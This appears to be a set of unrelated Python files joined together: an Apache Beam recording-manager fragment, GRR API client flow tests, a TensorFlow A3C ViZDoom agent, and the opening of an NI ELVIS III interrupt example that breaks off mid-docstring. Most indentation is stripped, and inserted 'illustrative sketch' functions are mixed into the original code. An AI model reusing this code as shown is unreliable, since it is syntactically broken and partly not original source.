uncomputed_pcolls = set(pcolls).difference(computed_pcolls)
if uncomputed_pcolls:
# Clear the cache of the given uncomputed PCollections because they are
# incomplete.
self._clear()
warnings.filterwarnings(
'ignore',
'options is deprecated since First stable release. References to '
'<pipeline>.options will not be supported',
category=DeprecationWarning)
pf.PipelineFragment(list(uncomputed_pcolls),
self.user_pipeline.options).run()
result = ie.current_env().pipeline_result(self.user_pipeline)
else:
result = None
recording = Recording(
self.user_pipeline, pcolls, result, max_n, max_duration_secs)
self._recordings.add(recording)
return recording
def read(self, pcoll_name, pcoll, max_n, max_duration_secs):
# type: (str, beam.pvalue.PValue, int, float) -> Union[None, ElementStream]
"""Reads an ElementStream of a computed PCollection.
Returns None if an error occurs. The caller is responsible for validating
whether the given pcoll_name and pcoll identify a watched and computed
PCollection without ambiguity in the notebook.
"""
try:
cache_key = CacheKey.from_pcoll(pcoll_name, pcoll).to_str()
return ElementStream(
pcoll, pcoll_name, cache_key, max_n, max_duration_secs)
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
# Caller should handle all validations. Here to avoid redundant
# validations, simply log errors if caller fails to do so.
_LOGGER.error(str(e))
return None
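# --- Illustrative sketch (not part of the original module) ---
# A minimal, hypothetical walkthrough of how the classes above fit together:
# create a RecordingManager for a user pipeline, record a PCollection, and
# iterate the resulting ElementStream. `user_pipeline` and `pcoll` stand in
# for objects defined in a notebook session; nothing here runs on import.
def _sketch_recording_usage(user_pipeline, pcoll):
  manager = RecordingManager(user_pipeline)
  # Record up to 10 elements or 60 seconds of data, whichever comes first.
  recording = manager.record([pcoll], max_n=10, max_duration=60)
  stream = recording.stream(pcoll)
  elements = list(stream.read(tail=False))
  recording.wait_until_finish()
  return elements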
|
flow_test.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Tests for API client and flows-related API calls."""
import io
import threading
import time
from typing import Iterable
import zipfile
from absl import app
from grr_api_client import errors as grr_api_errors
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.parsers import abstract as parser
from grr_response_core.lib.rdfvalues import artifacts as rdf_artifacts
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import client_action as rdf_client_action
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_core.lib.util import compatibility
from grr_response_proto.api import flow_pb2
from grr_response_server import data_store
from grr_response_server import flow_base
from grr_response_server.databases import db
from grr_response_server.flows.general import collectors
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_integration_test_lib
from grr_response_server.rdfvalues import flow_objects as rdf_flow_objects
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import action_mocks
from grr.test_lib import flow_test_lib
from grr.test_lib import parser_test_lib
from grr.test_lib import test_lib
from grr.test_lib import vfs_test_lib
class ApiClientLibFlowTest(api_integration_test_lib.ApiIntegrationTest):
"""Tests flows-related part of GRR Python API client library."""
def testSearchWithNoClients(self):
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testSearchClientsWith2Clients(self):
client_ids = sorted(self.SetupClients(2))
clients = sorted(
self.api.SearchClients(query="."), key=lambda c: c.client_id)
self.assertLen(clients, 2)
for i in range(2):
self.assertEqual(clients[i].client_id, client_ids[i])
self.assertEqual(clients[i].data.urn, "aff4:/%s" % client_ids[i])
def testListFlowsFromClientRef(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
flows = list(self.api.Client(client_id=client_id).ListFlows())
self.assertLen(flows, 1)
self.assertEqual(flows[0].client_id, client_id)
self.assertEqual(flows[0].flow_id, flow_id)
self.assertEqual(flows[0].data.flow_id, flow_id)
def testListFlowsFromClientObject(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
client = self.api.Client(client_id=client_id).Get()
flows = list(client.ListFlows())
self.assertLen(flows, 1)
self.assertEqual(flows[0].client_id, client_id)
self.assertEqual(flows[0].flow_id, flow_id)
self.assertEqual(flows[0].data.flow_id, flow_id)
def testCreateFlowWithUnicodeArguments(self):
unicode_str = "🐊 🐢 🦎 🐍"
client_id = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex=unicode_str, fetch_binaries=True)
client_ref = self.api.Client(client_id=client_id)
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
got_flow = client_ref.Flow(flow_id=result_flow.flow_id).Get()
self.assertEqual(got_flow.args.filename_regex, unicode_str)
def testCreateFlowFromClientRef(self):
client_id = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertEmpty(flows)
client_ref = self.api.Client(client_id=client_id)
client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertLen(flows, 1)
self.assertEqual(flows[0].args, args)
def testCreateFlowFromClientObject(self):
client_id = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertEmpty(flows)
client = self.api.Client(client_id=client_id).Get()
client.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertLen(flows, 1)
self.assertEqual(flows[0].args, args)
def testRunInterrogateFlow(self):
client_id = self.SetupClient(0)
client_ref = self.api.Client(client_id=client_id)
result_flow = client_ref.Interrogate()
self.assertEqual(result_flow.data.client_id, client_id)
self.assertEqual(result_flow.data.name, "Interrogate")
flows = data_store.REL_DB.ReadAllFlowObjects(client_id)
self.assertLen(flows, 1)
self.assertEqual(flows[0].flow_class_name, "Interrogate")
def testListResultsForListProcessesFlow(self):
process = rdf_client.Process(
pid=2,
ppid=1,
cmdline=["cmd.exe"],
exe="c:\\windows\\cmd.exe",
ctime=1333718907167083,
RSS_size=42)
client_id = self.SetupClient(0)
flow_id = flow_test_lib.TestFlowHelper(
compatibility.GetName(processes.ListProcesses),
client_id=client_id,
client_mock=action_mocks.ListProcessesMock([process]),
creator=self.test_username)
result_flow = self.api.Client(client_id=client_id).Flow(flow_id)
results = list(result_flow.ListResults())
self.assertLen(results, 1)
self.assertEqual(process.AsPrimitiveProto(), results[0].payload)
def testListParsedFlowResults(self):
client_id = self.SetupClient(0)
flow_id = "4815162342ABCDEF"
flow = rdf_flow_objects.Flow()
flow.client_id = client_id
flow.flow_id = flow_id
flow.flow_class_name = collectors.ArtifactCollectorFlow.__name__
flow.args = rdf_artifacts.ArtifactCollectorFlowArgs(apply_parsers=False)
flow.persistent_data = {"knowledge_base": rdf_client.KnowledgeBase()}
data_store.REL_DB.WriteFlowObject(flow)
result = rdf_flow_objects.FlowResult()
result.client_id = client_id
result.flow_id = flow_id
result.tag = "artifact:Echo"
response = rdf_client_action.ExecuteResponse()
response.stderr = "Lorem ipsum.".encode("utf-8")
result.payload = response
data_store.REL_DB.WriteFlowResults([result])
response = rdf_client_action.ExecuteResponse()
response.stderr = "Dolor sit amet.".encode("utf-8")
result.payload = response
data_store.REL_DB.WriteFlowResults([result])
class StderrToStdoutParser(
parser.SingleResponseParser[rdf_client_action.ExecuteResponse]):
supported_artifacts = ["Echo"]
def ParseResponse(
self,
knowledge_base: rdf_client.KnowledgeBase,
response: rdf_client_action.ExecuteResponse,
) -> Iterable[rdf_client_action.ExecuteResponse]:
del knowledge_base # Unused.
if not isinstance(response, rdf_client_action.ExecuteResponse):
raise TypeError(f"Unexpected response type: {type(response)}")
parsed_response = rdf_client_action.ExecuteResponse()
parsed_response.stdout = response.stderr
return [parsed_response]
with parser_test_lib._ParserContext("StderrToStdout", StderrToStdoutParser):
results = self.api.Client(client_id).Flow(flow_id).ListParsedResults()
stdouts = [result.payload.stdout.decode("utf-8") for result in results]
self.assertLen(stdouts, 2)
self.assertEqual(stdouts[0], "Lorem ipsum.")
self.assertEqual(stdouts[1], "Dolor sit amet.")
def testListFlowApplicableParsers(self):
client_id = self.SetupClient(0)
flow_id = "4815162342ABCDEF"
flow = rdf_flow_objects.Flow()
flow.client_id = client_id
flow.flow_id = flow_id
flow.flow_class_name = collectors.ArtifactCollectorFlow.__name__
flow.args = rdf_artifacts.ArtifactCollectorFlowArgs(apply_parsers=False)
data_store.REL_DB.WriteFlowObject(flow)
result = rdf_flow_objects.FlowResult()
result.client_id = client_id
result.flow_id = flow_id
result.tag = "artifact:Fake"
result.payload = rdf_client_action.ExecuteResponse(stderr=b"foobar")
data_store.REL_DB.WriteFlowResults([result])
class FakeParser(parser.SingleResponseParser[None]):
supported_artifacts = ["Fake"]
def ParseResponse(
self,
knowledge_base: rdf_client.KnowledgeBase,
response: rdfvalue.RDFValue,
) -> Iterable[None]:
raise NotImplementedError()
with parser_test_lib._ParserContext("Fake", FakeParser):
results = self.api.Client(client_id).Flow(flow_id).ListApplicableParsers()
self.assertLen(results.parsers, 1)
result = results.parsers[0]
self.assertEqual(result.name, "Fake")
self.assertEqual(result.type, flow_pb2.ApiParserDescriptor.SINGLE_RESPONSE)
def testWaitUntilDoneReturnsWhenFlowCompletes(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
result_flow = self.api.Client(client_id=client_id).Flow(flow_id).Get()
self.assertEqual(result_flow.data.state, result_flow.data.RUNNING)
def ProcessFlow():
time.sleep(1)
client_mock = action_mocks.ListProcessesMock([])
flow_test_lib.FinishAllFlowsOnClient(client_id, client_mock=client_mock)
t = threading.Thread(target=ProcessFlow)
t.start()
try:
f = result_flow.WaitUntilDone()
self.assertEqual(f.data.state, f.data.TERMINATED)
finally:
t.join()
def testWaitUntilDoneRaisesWhenFlowFails(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
result_flow = self.api.Client(client_id=client_id).Flow(flow_id).Get()
def ProcessFlow():
time.sleep(1)
flow_base.TerminateFlow(client_id, flow_id, "")
t = threading.Thread(target=ProcessFlow)
t.start()
try:
with self.assertRaises(grr_api_errors.FlowFailedError):
result_flow.WaitUntilDone()
finally:
t.join()
def testWaitUntilDoneRaisesWhenItTimesOut(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
result_flow = self.api.Client(client_id=client_id).Flow(flow_id).Get()
with self.assertRaises(grr_api_errors.PollTimeoutError):
result_flow.WaitUntilDone(timeout=1)
def _SetupFlowWithStatEntryResults(self):
client_id = self.SetupClient(0)
# Start a flow. The exact type of the flow doesn't matter:
# we'll add results manually.
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
data_store.REL_DB.WriteFlowResults([
rdf_flow_objects.FlowResult(
client_id=client_id,
flow_id=flow_id,
payload=rdf_client_fs.StatEntry(
pathspec=rdf_paths.PathSpec(
path="/foo/bar1",
pathtype=rdf_paths.PathSpec.PathType.OS))),
rdf_flow_objects.FlowResult(
client_id=client_id,
flow_id=flow_id,
payload=rdf_client_fs.StatEntry(
pathspec=rdf_paths.PathSpec(
path="/foo/bar2",
pathtype=rdf_paths.PathSpec.PathType.OS))),
])
return client_id, flow_id
def testGetFilesArchiveGeneratesCorrectArchive(self):
client_id, flow_id = self._SetupFlowWithStatEntryResults()
blob_size = 1024 * 1024 * 4
blob_data, blob_refs = vfs_test_lib.GenerateBlobRefs(blob_size, "ab")
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS(client_id, ["foo", "bar1"]), blob_refs, blob_data)
blob_data, blob_refs = vfs_test_lib.GenerateBlobRefs(blob_size, "cd")
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS(client_id, ["foo", "bar2"]), blob_refs, blob_data)
zip_stream = io.BytesIO()
self.api.Client(client_id).Flow(flow_id).GetFilesArchive().WriteToStream(
zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
prefix = "%s_flow_ListProcesses_%s" % (client_id, flow_id)
namelist = zip_fd.namelist()
self.assertCountEqual(namelist, [
"%s/MANIFEST" % prefix,
"%s/%s/client_info.yaml" % (prefix, client_id),
"%s/%s/fs/os/foo/bar1" % (prefix, client_id),
"%s/%s/fs/os/foo/bar2" % (prefix, client_id),
])
for info in zip_fd.infolist():
self.assertGreater(info.compress_size, 0)
def testGetFilesArchiveFailsWhenFirstFileBlobIsMissing(self):
client_id, flow_id = self._SetupFlowWithStatEntryResults()
_, blob_refs = vfs_test_lib.GenerateBlobRefs(10, "0")
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS(client_id, ["foo", "bar1"]), blob_refs, [])
zip_stream = io.BytesIO()
with self.assertRaisesRegex(grr_api_errors.UnknownError,
"Could not find one of referenced blobs"):
self.api.Client(client_id).Flow(flow_id).GetFilesArchive().WriteToStream(
zip_stream)
def testGetFilesArchiveDropsStreamingResponsesWhenSecondFileBlobIsMissing(
self):
client_id, flow_id = self._SetupFlowWithStatEntryResults()
blob_data, blob_refs = vfs_test_lib.GenerateBlobRefs(1024 * 1024 * 4, "abc")
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS(client_id, ["foo", "bar1"]), blob_refs, blob_data[0:2])
zip_stream = io.BytesIO()
timestamp = rdfvalue.RDFDatetime.Now()
self.api.Client(client_id).Flow(flow_id).GetFilesArchive().WriteToStream(
zip_stream)
with self.assertRaises(zipfile.BadZipfile):
zipfile.ZipFile(zip_stream)
# Check that notification was pushed indicating the failure to the user.
pending_notifications = list(self.api.GrrUser().ListPendingNotifications(
timestamp=timestamp.AsMicrosecondsSinceEpoch()))
self.assertLen(pending_notifications, 1)
self.assertEqual(
pending_notifications[0].data.notification_type,
int(rdf_objects.UserNotification.Type
.TYPE_FILE_ARCHIVE_GENERATION_FAILED))
self.assertEqual(pending_notifications[0].data.reference.type,
pending_notifications[0].data.reference.FLOW)
self.assertEqual(pending_notifications[0].data.reference.flow.client_id,
client_id)
self.assertEqual(pending_notifications[0].data.reference.flow.flow_id,
flow_id)
# TODO(user): These unit tests should be moved to a dedicated GrrApi test.
def testClientReprContainsClientId(self):
client_id = self.SetupClient(0)
client_ref = self.api.Client(client_id=client_id)
self.assertIn(client_id, repr(client_ref))
self.assertIn(client_id, repr(client_ref.Get()))
def testFlowReprContainsMetadata(self):
client_id = self.SetupClient(0)
flow_id = flow_test_lib.StartFlow(
processes.ListProcesses, client_id=client_id)
flow_ref = self.api.Client(client_id=client_id).Flow(flow_id)
self.assertIn(client_id, repr(flow_ref))
self.assertIn(flow_id, repr(flow_ref))
flow = flow_ref.Get()
self.assertIn(client_id, repr(flow))
self.assertIn(flow_id, repr(flow))
self.assertIn("ListProcesses", repr(flow))
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
agent_a3c_1.py
|
#!/usr/bin/env python
from __future__ import print_function
import numpy as np
import cv2
import tensorflow as tf
import threading
import sys
import time
import os
def MakeDir(path):
try:
os.makedirs(path)
except OSError:
# the directory may already exist
pass
lab = False
load_model = False
train = True
test_display = False
test_write_video = True
path_work_dir = "rl_3d/"
vizdoom_path = "ViZDoom/"
vizdoom_scenario = vizdoom_path + "scenarios/locha_home.wad"
if (lab):
from env_lab import EnvLab
model_path = path_work_dir + "model_lab_a3c/"
else:
from env_vizdoom_1 import EnvVizDoom
model_path = path_work_dir + "model_vizdoom_a3c/"
learning_rate = 0.00025
device = "/cpu:0"
num_workers = 3
t_max = 30
frame_repeat = 4 #10 # 4
gamma = 0.99
step_num = int(2.5e5)
save_each = 0.01 * step_num
step_load = 100
entropy_beta = 0.01
grad_norm_clip = 40.0
global_scope_name = "global"
step = 0
train_scores = []
lock = threading.Lock()
start_time = 0
# Global.
env = None
MakeDir(model_path)
model_name = model_path + "a3c"
def PrintStat(elapsed_time, step, step_num, train_scores):
steps_per_s = 1.0 * step / elapsed_time
steps_per_m = 60.0 * step / elapsed_time
steps_per_h = 3600.0 * step / elapsed_time
steps_remain = step_num - step
remain_h = int(steps_remain / steps_per_h)
remain_m = int((steps_remain - remain_h * steps_per_h) / steps_per_m)
remain_s = int((steps_remain - remain_h * steps_per_h - remain_m * steps_per_m) / steps_per_s)
elapsed_h = int(elapsed_time / 3600)
elapsed_m = int((elapsed_time - elapsed_h * 3600) / 60)
elapsed_s = int((elapsed_time - elapsed_h * 3600 - elapsed_m * 60))
print("{}% | Steps: {}/{}, {:.2f}M step/h, {:02}:{:02}:{:02}/{:02}:{:02}:{:02}".format(
100.0 * step / step_num, step, step_num, steps_per_h / 1e6,
elapsed_h, elapsed_m, elapsed_s, remain_h, remain_m, remain_s), file=sys.stderr)
mean_train = 0
std_train = 0
min_train = 0
max_train = 0
if (len(train_scores) > 0):
train_scores = np.array(train_scores)
mean_train = train_scores.mean()
std_train = train_scores.std()
min_train = train_scores.min()
max_train = train_scores.max()
print("Episodes: {} Rewards: mean: {:.2f}, std: {:.2f}, min: {:.2f}, max: {:.2f}".format(
len(train_scores), mean_train, std_train, min_train, max_train), file=sys.stderr)
channels = 3
resolution = (40, 40, channels)
def Preprocess(frame):
if (channels == 1):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(frame, (resolution[1], resolution[0]))
return np.reshape(frame, resolution)
class ACNet(object):
def __init__(self, num_actions, scope, trainer):
with tf.variable_scope(scope):
self.inputs = tf.placeholder(shape=[None] + list(resolution), dtype=tf.float32)
conv1 = tf.contrib.layers.conv2d(self.inputs, num_outputs=16, kernel_size=[3, 3], stride=[2, 2])
conv2 = tf.contrib.layers.conv2d(conv1, num_outputs=32, kernel_size=[3, 3], stride=[2, 2])
conv2_flat = tf.contrib.layers.flatten(conv2)
hidden = tf.contrib.layers.fully_connected(conv2_flat, 256)
# Recurrent network for temporal dependencies
# Introduce a "fake" batch dimension of 1 after flatten so that we can do LSTM over time dim
rnn_in = tf.expand_dims(hidden, [0])
lstm_size = 256
lstm_cell = tf.contrib.rnn.BasicLSTMCell(lstm_size, state_is_tuple=True)
step_size = tf.shape(self.inputs)[:1]
c_init = np.zeros((1, lstm_cell.state_size.c), dtype=np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), dtype=np.float32)
self.state_init = [c_init, h_init]
self.rnn_state = self.state_init
c_in = tf.placeholder(shape=[1, lstm_cell.state_size.c], dtype=tf.float32)
h_in = tf.placeholder(shape=[1, lstm_cell.state_size.h], dtype=tf.float32)
self.state_in = (c_in, h_in)
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(lstm_cell, rnn_in, initial_state=state_in,
sequence_length=step_size, time_major=False)
lstm_c, lstm_h = lstm_state
rnn_out = tf.reshape(lstm_outputs, [-1, lstm_size])
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
# Output layers for policy and value estimations
self.policy = tf.contrib.layers.fully_connected(rnn_out, num_actions, activation_fn=tf.nn.softmax,
weights_initializer=self.normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = tf.contrib.layers.fully_connected(rnn_out, 1, activation_fn=None,
weights_initializer=self.normalized_columns_initializer(1.0),
biases_initializer=None)
# Only the worker networks need ops for loss functions and gradient updating.
if (scope != global_scope_name):
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
actions_onehot = tf.one_hot(self.actions, num_actions, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
responsible_outputs = tf.reduce_sum(self.policy * actions_onehot, [1])
# Loss functions
value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
entropy = -tf.reduce_sum(self.policy * tf.log(self.policy))
policy_loss = -tf.reduce_sum(tf.log(responsible_outputs) * self.advantages)
self.loss = 0.5 * value_loss + policy_loss - entropy * entropy_beta
# Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss, local_vars)
if (grad_norm_clip is not None):
grads, _ = tf.clip_by_global_norm(self.gradients, grad_norm_clip)
else:
grads = self.gradients
# Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, global_scope_name)
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
# Used to initialize weights for policy and value output layers
def normalized_columns_initializer(self, std = 1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def Train(self, sess, discounted_rewards, states, actions, advantages):
states = states / 255.0
self.ResetLstm()
feed_dict = {self.target_v : discounted_rewards,
self.inputs : np.stack(states, axis=0),
self.actions : actions,
self.advantages : advantages,
self.state_in[0] : self.rnn_state[0],
self.state_in[1] : self.rnn_state[1]}
_ = sess.run([self.apply_grads], feed_dict=feed_dict)
def ResetLstm(self):
self.rnn_state = self.state_init
def GetAction(self, sess, state):
state = state / 255.0
a_dist, v, self.rnn_state = sess.run([self.policy, self.value, self.state_out],
feed_dict={self.inputs: [state],
self.state_in[0]: self.rnn_state[0],
self.state_in[1]: self.rnn_state[1]})
# Sample an action index directly from the policy distribution.
a = np.random.choice(len(a_dist[0]), p=a_dist[0])
return a, v[0, 0]
def GetValue(self, sess, state):
state = state / 255.0
v = sess.run([self.value],
feed_dict={self.inputs: [state],
self.state_in[0]: self.rnn_state[0],
self.state_in[1]: self.rnn_state[1]})
return v[0][0, 0]
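# --- Illustrative sketch (not part of the original script) ---
# A tiny, hypothetical numpy illustration of the "fake batch dimension" trick
# commented in ACNet.__init__: a batch of T flattened frames (size 256) is
# reshaped to [1, T, 256] so the LSTM treats the batch axis as the time axis.
def SketchFakeBatchDim(t_steps=5, hidden_size=256):
    hidden = np.zeros((t_steps, hidden_size), dtype=np.float32)  # shape [T, 256]
    rnn_in = np.expand_dims(hidden, 0)                           # shape [1, T, 256]
    return rnn_in.shape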
class Worker(object):
def __init__(self, number, num_actions, trainer, model_name):
self.name = "worker_" + str(number)
self.number = number
self.model_name = model_name
# Create the local copy of the network and the tensorflow op to copy global parameters to the local network
self.local_ac = ACNet(num_actions, self.name, trainer)
self.update_target_graph = self.update_target(global_scope_name, self.name)
if (lab):
self.env = EnvLab(80, 80, 60, "seekavoid_arena_01")
else:
self.env = EnvVizDoom(vizdoom_scenario)
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target(self, from_scope, to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var, to_var in zip(from_vars, to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
# Calculate discounted returns.
def Discount(self, x, gamma):
for idx in reversed(range(len(x) - 1)):
x[idx] += x[idx + 1] * gamma
return x
def Start(self, session, saver, coord):
worker_process = lambda: self.Process(session, saver, coord)
thread = threading.Thread(target=worker_process)
thread.start()
global start_time
start_time = time.time()
return thread
def Train(self, episode_buffer, sess, bootstrap_value):
episode_buffer = np.array(episode_buffer)
states = episode_buffer[:, 0]
actions = episode_buffer[:, 1]
rewards = episode_buffer[:, 2]
values = episode_buffer[:, 3]
# Here we take the rewards and values from the episode_buffer, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = self.Discount(rewards_plus, gamma)[:-1]
value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * value_plus[1:] - value_plus[:-1]
advantages = self.Discount(advantages, gamma)
# Update the global network using gradients from loss
# Generate network statistics to periodically save
self.local_ac.Train(sess, discounted_rewards, states, actions, advantages)
def Process(self, sess, saver, coord):
global step, train_scores, start_time, lock
print("Starting worker " + str(self.number))
while (not coord.should_stop()):
sess.run(self.update_target_graph)
episode_buffer = []
episode_reward = 0
self.env.Reset()
s = self.env.Observation()
s = Preprocess(s)
self.local_ac.ResetLstm()
while (self.env.IsRunning()):
# Take an action using probabilities from policy network output.
a, v = self.local_ac.GetAction(sess, s)
r = self.env.Act(a, frame_repeat)
finished = not self.env.IsRunning()
if (not finished):
s1 = self.env.Observation()
s1 = Preprocess(s1)
else:
s1 = None
episode_buffer.append([s, a, r, v])
episode_reward += r
s = s1
lock.acquire()
step += 1
if (step % save_each == 0):
model_name_curr = self.model_name + "_{:04}".format(int(step / save_each))
print("\nSaving the network weigths to:", model_name_curr, file=sys.stderr)
saver.save(sess, model_name_curr)
PrintStat(time.time() - start_time, step, step_num, train_scores)
train_scores = []
if (step == step_num):
coord.request_stop()
lock.release()
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if (len(episode_buffer) == t_max or (finished and len(episode_buffer) > 0)):
# Since we don't know what the true final return is,
# we "bootstrap" from our current value estimation.
if (not finished):
v1 = self.local_ac.GetValue(sess, s)
self.Train(episode_buffer, sess, v1)
episode_buffer = []
sess.run(self.update_target_graph)
else:
self.Train(episode_buffer, sess, 0.0)
lock.acquire()
train_scores.append(episode_reward)
lock.release()
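# --- Illustrative sketch (not part of the original script) ---
# A small, hypothetical worked example of the return/advantage arithmetic in
# Worker.Train above: discounted returns are a reverse cumulative sum, and
# advantages are discounted one-step TD errors (GAE with lambda = 1). Plain
# lists replace the episode buffer; the numbers are made up.
def SketchDiscountAndAdvantages(rewards=(1.0, 0.0, 1.0),
                                values=(0.5, 0.4, 0.6),
                                bootstrap_value=0.0,
                                discount=0.99):
    rewards_plus = list(rewards) + [bootstrap_value]
    discounted_rewards = list(rewards_plus)
    for idx in reversed(range(len(discounted_rewards) - 1)):  # as in Discount()
        discounted_rewards[idx] += discounted_rewards[idx + 1] * discount
    discounted_rewards = discounted_rewards[:-1]
    value_plus = list(values) + [bootstrap_value]
    deltas = [rewards[i] + discount * value_plus[i + 1] - value_plus[i]
              for i in range(len(rewards))]
    advantages = list(deltas)
    for idx in reversed(range(len(advantages) - 1)):
        advantages[idx] += advantages[idx + 1] * discount
    return discounted_rewards, advantages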
class Agent(object):
def __init__(self):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.log_device_placement = False
config.allow_soft_placement = True
self.session = tf.Session(config=config)
with tf.device(device):
# Global network
self.global_net = ACNet(env.NumActions(), global_scope_name, None)
if (train):
trainer = tf.train.RMSPropOptimizer(learning_rate)
workers = []
for i in range(num_workers):
workers.append(Worker(i, env.NumActions(), trainer, model_name))
saver = tf.train.Saver(max_to_keep=100)
if (load_model):
model_name_curr = model_name + "_{:04}".format(step_load)
print("Loading model from: ", model_name_curr)
saver.restore(self.session, model_name_curr)
else:
self.session.run(tf.global_variables_initializer())
if (train):
coord = tf.train.Coordinator()
# Start the "work" process for each worker in a separate thread.
worker_threads = []
for worker in workers:
thread = worker.Start(self.session, saver, coord)
worker_threads.append(thread)
coord.join(worker_threads)
def Reset(self):
self.global_net.ResetLstm()
def Act(self, state):
action, _ = self.global_net.GetAction(self.session, state)
return action
def Test(agent):
if (test_write_video):
size = (640, 480)
fps = 30.0
fourcc = cv2.VideoWriter_fourcc(*'XVID') # cv2.cv.CV_FOURCC(*'XVID')
out_video = cv2.VideoWriter(path_work_dir + "test.avi", fourcc, fps, size)
reward_total = 0
num_episodes = 30
while (num_episodes != 0):
if (not env.IsRunning()):
env.Reset()
agent.Reset()
print("Total reward: {}".format(reward_total))
reward_total = 0
num_episodes -= 1
state_raw = env.Observation()
state = Preprocess(state_raw)
action = agent.Act(state)
for _ in range(frame_repeat):
if (test_display):
cv2.imshow("frame-test", state_raw)
cv2.waitKey(20)
if (test_write_video):
out_video.write(state_raw)
reward = env.Act(action, 1)
reward_total += reward
if (not env.IsRunning()):
break
state_raw = env.Observation()
if __name__ == '__main__':
if (lab):
env = EnvLab(80, 80, 60, "seekavoid_arena_01")
else:
env = EnvVizDoom(vizdoom_scenario)
agent = Agent()
Test(agent)
|
DIIRQ.py
|
"""
NI ELVIS III Digital Input Interrupt Example
This example illustrates how to register a digital input interrupt (DI IRQ) on
the NI ELVIS III. The program first defines the configuration for the DI IRQ,
and then creates a thread to wait for an interrupt. The irq_handler function
executes when the DI channel receives an appropriate digital signal to trigger
the interrupt conditions.
The DI IRQ configuration consists of seven parameters: irq_channel, irq_handler,
irq_number, timeout, interrupt_type_rising, interrupt_type_falling, and
edge_count. There are four DI channels that support DI IRQ configuration, which are
DIO0 to DIO3 on bank A. Each configuration contains two parameters to define
whether to register the interrupt at the rising edge or falling edge as
indicated in this table:
                           Rising only    Falling only    Both edges
interrupt_type_rising          True           False           True
interrupt_type_falling         False          True            True
There are 8 IRQ numbers (IRQ1 to IRQ8). You cannot register an I/O interrupt
with the same IRQ number as that of a registered I/O interrupt. However, after
you close the existing interrupt, you can use the IRQ number to register another
interrupt.
irq_handler defines the callback function which you use to handle interrupts.
The callback function executes when the interrupt occurs. You can customize
the callback function as needed. For example, you can write code to make an
LED flash as shown in this example, or to read from an AI channel.
This example uses:
Bank A, Channel DIO0.
Hardware setup:
Connect a digital signal source to DIO0 on bank A. Send a digital signal
that meets the interrupt conditions we configure before the timeout
expires. You can connect BTN0 to DIO0 on bank A to trigger the interrupt by
wiring it as follows:
1. Connect a pin of a 10k Ohm resistance to both BTN0 A and DIO0 on
bank A.
2. Connect a +3.3 V voltage source to another pin of the 10k Ohm
resistance.
3. Connect BTN0 B to DGND.
Press BTN0. The interrupt is triggered.
Result:
